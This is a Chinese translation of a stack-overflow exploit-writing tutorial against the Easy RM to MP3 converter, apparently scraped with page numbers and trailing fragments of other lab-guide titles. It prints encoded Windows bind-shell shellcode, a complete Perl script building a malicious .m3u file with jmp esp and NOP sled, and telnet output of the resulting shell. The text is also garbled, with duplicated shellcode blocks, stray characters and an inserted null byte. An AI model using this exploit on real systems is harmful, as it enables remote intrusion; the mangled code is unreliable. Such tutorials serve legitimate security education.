如果你复制 / 粘贴这个 shellcode, 你可以看到程序并没有预期中的崩溃这个看起来可能是缓冲区大小问题而导致, 但我们不确定还, 或者是 shellcode 中含无效字符, 但是你必须知道哪些字符是允许的, 哪些不是, 一般,NULL 字符是不允许出现的, 但其他的字符呢? m3u 格式文件是应该是要包含文件名的, 所以一个好的开端是要过滤在文件名和路径中不被允许的字符, 你还可以使用另一个解码器限制字符集连接我们使用 shikata_ga_nai, 但也许用 alpha_upper 在文件名上会做得更好使用其他编码器, 很可能会增加 shellcode 的长度, 但我们已经看到 ( 或者我们可以模拟 ) 这个大小不是一个大问题我们用 alpha_upper 编码器 ( 相当于加一下密 ) 写一个绑定 TCp 的 shell, 我们将绑定 4444 端口, 这个新的 shellcode 大小为 703 字节

20 # windows/shell_bind_tcp bytes # # Encoder: x86/alpha_upper # EXITFUNC=seh, LPORT=4444, RHOST= "\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" "\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" "\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" "\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" "\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" "\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" "\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" "\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" "\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" "\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" "\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" "\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" "\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" "\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" "\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" "\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" "\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" <...> "\x50\x41\x41"; 让我们用这个 shellcode:ps: 下面的 shellcode 我是手打上来的也许你复制 / 粘贴会不能运行, 但是现在你应该知道如何写一个有效的 Exploit 了吧 # # Exploit for Easy RM to MP vulnerability, discovered by Crazy_Hacker # Written by Peter Van Eeckhoutte # # Greetings to Saumil and SK :-) # # tested on Windows XP SP3 (En) # # # my $file= "exploitrmtomp3.m3u"; my $junk= "A" x 26094; my $eip = pack('v',0x01ccf23a); #jmp esp from MSRMCcodec02.dll my $shellcode = "\x90" x 25; # windows/shell_bind_tcp bytes # # Encoder: x86/alpha_upper # EXITFUNC=seh, LPORT=4444, RHOST= $shellcode=$shellcode."\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\ x49". "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56". "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41". "\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42". "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42". "\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b". "\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47". "\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a". "\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43". "\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a". "\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44". "\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a". "\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a". "\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c". "\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a". "\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45". "\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50". "\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45". "\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c".

$"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43". "\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43". "\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42".$

21 "\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43". "\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43". "\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42". "\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48". "\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43". "\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42". "\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48". "\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51". "\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42". "\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42". "\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48". "\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43". "\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e". "\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50". "\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50". "\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a". "\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50". "\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45". "\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" "\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" "\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" "\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" "\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" "\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" "\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" "\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" "\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" "\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" "\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" "\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" "\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" "\x50\x41\x41"; open($file,">$file"); print $FILE $junk.$eip.$shellcode; close($file); print "m3u File Created successfully\n"; 创建这个 m3u 文件并打开, 现在 Easy RM to MP3 看起来像是被挂起了 : Telnet 主机的 4444 端口 : root@bt:/# telnet Trying Connected to Escape character is '^]'. Microsoft Windows XP [Version ] (C) Copyright Microsoft Corp. C:\Program Files\Easy RM to MP3 Converter> 哦也! 现在退出并编写你自己的 shellcode 吧不要忘了做你自己的 nice ascii art, 获得一个 133t 名字, 和发送你的祝福给我 (corelanc0d3r) :-)

实验指导书

实验指导书从零开始学习软件漏洞挖掘系列教程第七篇 : 实战挖掘 Mini-stream Ripper 缓冲区溢出漏洞 1 实验简介实验所属系列 : 系统安全实验对象 : 本科 / 专科信息安全专业相关课程及专业 : 计算机网络实验时数 ( 学分 ):2 学时实验类别 : 实践实验类 2 实验目的通过利用一个存在漏洞的程序, 巩固前面学过的知识注意由于环境原因, 你在实验看到的地址和我的不一样,

Exploit 编写教程第一篇 : 基于栈的溢出 译 : 看雪论坛 -moonife 上个星期五 ( ), 一个叫 Crazy_Hacker 的人 (nick) 在 packetstormsecurity.org. 网站报告了一个存在于 Easy RM to M

Exploit 编写教程第一篇 : 基于栈的溢出译 : 看雪论坛 -moonife 上个星期五 ( ), 一个叫 Crazy_Hacker 的人 (nick) 在 packetstormsecurity.org. 网站报告了一个存在于 Easy RM to M